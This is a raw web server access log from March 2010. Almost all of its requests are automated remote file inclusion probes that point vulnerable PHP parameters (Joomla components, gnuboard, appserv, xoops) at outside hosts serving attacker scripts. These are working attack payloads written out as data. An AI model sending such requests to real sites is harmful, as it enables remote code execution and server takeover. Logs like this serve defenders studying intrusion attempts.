64.15.152.132 - - [01/Mar/2010:09:24:41 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:24:48 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:24:48 -0800] "GET /logs/access_100217.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:24:48 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:26:08 -0800] "GET /logs/access_100206.log%20%20//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:27:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:27:08 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:27:11 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:09:27:14 -0800] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:27:56 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:27:59 -0800] "GET /logs/access_100202.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:28:16 -0800] "GET /logs/access_100123.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:28:22 -0800] "GET /logs/access_100123.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:28:25 -0800] "GET /logs/access_100217.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:09:28:51 -0800] "GET /logs/access_100201.log///index.php?load=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:29:23 -0800] "GET /logs/access_100212.log%20%20///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:09:29:49 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:09:29:49 -0800] "GET /appserv/main.php?appserv_root=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:09:29:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:30:27 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:30:27 -0800] "GET /logs/access_100118.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:30:27 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:31:22 -0800] "GET /logs/access_100211.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:31:31 -0800] "GET /logs/access_100211.log////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:31:42 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:31:42 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:31:42 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:31:48 -0800] "GET /logs/access_100202.log//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [01/Mar/2010:09:31:53 -0800] "GET /logs/access_100205.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [01/Mar/2010:09:31:53 -0800] "GET /logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [01/Mar/2010:09:31:53 -0800] "GET /bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [01/Mar/2010:09:32:53 -0800] "GET /logs/access_100121.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:32:54 -0800] "GET /logs/access_100206.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:32:55 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:32:56 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:33:29 -0800] "GET /logs/access_100126.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:33:45 -0800] "GET /logs/access_100210.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:33:55 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:35:15 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:35:15 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:35:15 -0800] "GET /logs/access_100205.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:36:12 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:36:15 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:09:39:17 -0800] "GET /logs/access_100118.log/[Script%20Path]/admin/index.php?o=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:09:39:17 -0800] "GET /[Script%20Path]/admin/index.php?o=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:09:39:17 -0800] "GET /logs/[Script%20Path]/admin/index.php?o=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:42:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:42:27 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:42:41 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:42:52 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:45:06 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:45:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:45:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:45:40 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:45:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:45:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:45:51 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:06 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:06 -0800] "GET /logs/access_100131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:06 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:11 -0800] "GET /logs/access_100214.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:46:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:46:11 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:46:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:24 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:24 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:46:25 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:46:31 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:47:01 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:47:01 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:47:02 -0800] "GET /logs/access_100131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:47:17 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:47:22 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:47:22 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:09:47:32 -0800] "GET /logs/access_100129.log//addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:09:47:32 -0800] "GET /addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:47:39 -0800] "GET /logs/access_100214.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:48:09 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:48:09 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:48:09 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:09:48:15 -0800] "GET /logs/access_100214.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:09:48:21 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:09:48:21 -0800] "GET /logs/access_100119.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:09:48:21 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:48:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:48:24 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:48:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.245.60.130 - - [01/Mar/2010:09:48:30 -0800] "GET /logs//addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:48:35 -0800] "GET /logs/access_100123.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:09:48:37 -0800] "GET /logs/access_100220.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:42 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:42 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:09:48:44 -0800] "GET /logs/access_100206.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:55 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:55 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:48:55 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:50:54 -0800] "GET /logs/access_100126.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:50:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:09:50:54 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:51:04 -0800] "GET /logs/access_100212.log%20%20////delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:51:04 -0800] "GET ///delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:51:04 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:09:51:07 -0800] "GET /logs/access_100119.log%20%20////delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:51:20 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:51:20 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:51:20 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [01/Mar/2010:09:53:01 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:53:17 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:53:17 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:53:17 -0800] "GET /logs/access_100209.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:53:43 -0800] "GET /logs/access_100123.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.126.38 - - [01/Mar/2010:09:53:55 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
174.129.126.38 - - [01/Mar/2010:09:53:55 -0800] "GET /ideal/forum/viewtopic.php?p=27885 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
